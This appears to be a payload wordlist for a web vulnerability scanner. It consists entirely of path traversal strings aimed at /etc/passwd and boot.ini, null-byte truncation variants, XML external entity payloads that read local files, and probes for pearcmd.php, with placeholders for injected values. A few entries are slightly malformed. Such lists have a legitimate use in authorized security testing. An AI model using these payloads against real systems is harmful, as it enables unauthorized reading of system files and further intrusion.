http://www.google.fr/?
/etc/passwd
/etc/passwd\0
c:\\boot.ini
c:\\boot.ini\0
../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd\0
../../../../../../../../../../../../../../../../../../../../etc/passwd\0
../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini\0
../../../../../../../../../../../../../../../../../../../../boot.ini\0
[VALUE]/../../../../../../../../../../etc/passwd
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
[VALUE]/../../../../../../../../../../etc/passwd\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
[VALUE]/../../../../../../../../../../boot.ini
[VALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini
[VALUE]/../../../../../../../../../../boot.ini\0
[VALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini\0
[DIRVALUE]/../../../../../../../../../../etc/passwd
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd
[DIRVALUE]/../../../../../../../../../../etc/passwd\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0
[DIRVALUE]/../../../../../../../../../../boot.ini
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini
[DIRVALUE]/../../../../../../../../../../boot.ini\0
[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini\0
/etc/passwd\0index.htm
/etc/passwd\0index.html
/etc/passwd\0index.php
/etc/passwd\0index.asp
/etc/passwd\0index.aspx
/etc/passwd\0index.css
c:\\boot.ini\0index.htm
c:\\boot.ini\0index.html
c:\\boot.ini\0index.php
c:\\boot.ini\0index.asp
c:\\boot.ini\0index.aspx
c:\\boot.ini\0index.css
../../../../../../../../../../etc/passwd\0index.htm
../../../../../../../../../../etc/passwd\0index.html
../../../../../../../../../../etc/passwd\0index.php
../../../../../../../../../../etc/passwd\0index.asp
../../../../../../../../../../etc/passwd\0index.aspx
../../../../../../../../../../etc/passwd\0index.css
../../../../../../../../../../etc/passwd\0pix.gif
../../../../../../../../../../boot.ini\0index.htm
../../../../../../../../../../boot.ini\0index.html
../../../../../../../../../../boot.ini\0index.php
../../../../../../../../../../boot.ini\0index.asp
../../../../../../../../../../boot.ini\0index.aspx
../../../../../../../../../../boot.ini\0index.css
../../../../../../../../../../boot.ini\0pix.gix
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini>]><foo>&xxe;</foo>
.depdb
.depdb\0
pearcmd.php
pearcmd.php\0
[FILE_NAME]
[FILE_NAME]\0
